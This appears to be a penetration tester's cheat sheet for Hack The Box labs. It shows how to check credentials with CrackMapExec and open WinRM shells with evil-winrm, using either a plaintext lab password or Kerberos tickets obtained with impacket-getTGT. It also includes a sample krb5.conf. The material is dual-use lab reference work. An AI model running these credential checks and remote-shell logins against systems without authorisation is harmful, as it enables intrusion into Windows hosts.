WinRM
CME (CrackMapExec)
# Check whether the account's credentials are accepted by the WinRM service on the host.
# The password is passed as an argument, so it is stored in shell history and is
# visible in the local process list while the command runs.
cme winrm manager.htb -u raven -p 'R4v3nBe5tD3veloP3r!123'
evil-winrm
simple connection
# Open an interactive WinRM session with username/password authentication.
# -u is the account, -p the password, -i the remote host.
# As above, the password on the command line lands in shell history.
evil-winrm -u 'raven' -p 'R4v3nBe5tD3veloP3r!123' -i manager.htb
Connection using Kerberos
# Tell Kerberos-aware tools which credential cache file holds the ticket.
# The file has to exist by the time evil-winrm runs; it is created by the
# "Get ticket" step further down.
# NOTE(review): impacket-getTGT names its output after the account
# (<username>.ccache) - make sure the name exported here matches that file.
export KRB5CCNAME=user.ccache
# Edit /etc/krb5.conf so the realm and KDC match the target domain (example below)
┌──(kali㉿kali)-[~/hack-the-box/machines]
└─$ cat /etc/krb5.conf
# Example client configuration; DOMAIN.LOCAL / dc01.domain.local are placeholders.
[libdefaults]
# Realm used when none is given; written in upper case like the [realms] entry below.
default_realm = DOMAIN.LOCAL
# DNS-based realm and KDC discovery are switched off, so the KDC has to be
# listed explicitly under [realms].
dns_lookup_realm = false
dns_lookup_kdc = false
forwardable = true
[realms]
DOMAIN.LOCAL = {
# The KDC host name must resolve from this machine (DNS or /etc/hosts).
kdc = dc01.domain.local
admin_server = dc01.domain.local
}
[domain_realm]
# Map host names in the DNS domain (with and without the leading dot) to the realm.
.domain.local = DOMAIN.LOCAL
domain.local = DOMAIN.LOCAL
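# Get ticket
# Requests a TGT for the account; impacket-getTGT saves it as <username>.ccache
# in the current directory. The -dc-ip host is the placeholder DC from the
# krb5.conf example (the original line pointed at a host from a different lab).
# The password is given on the command line, so it ends up in shell history.
impacket-getTGT domain/username:'Password' -dc-ip dc01.domain.local
# Point Kerberos clients at the ticket that was just written, so the cache name
# matches the file getTGT produced.
export KRB5CCNAME=username.ccache
# Kerberos login: -r names the realm configured in /etc/krb5.conf and -i should
# be the host's FQDN, since the service ticket is requested for that host name.
# -u/-p are dropped: the ticket supplies the identity, and a -p with no value
# would most likely consume the following -i as the password.
evil-winrm -i dc01.domain.local -r domain.local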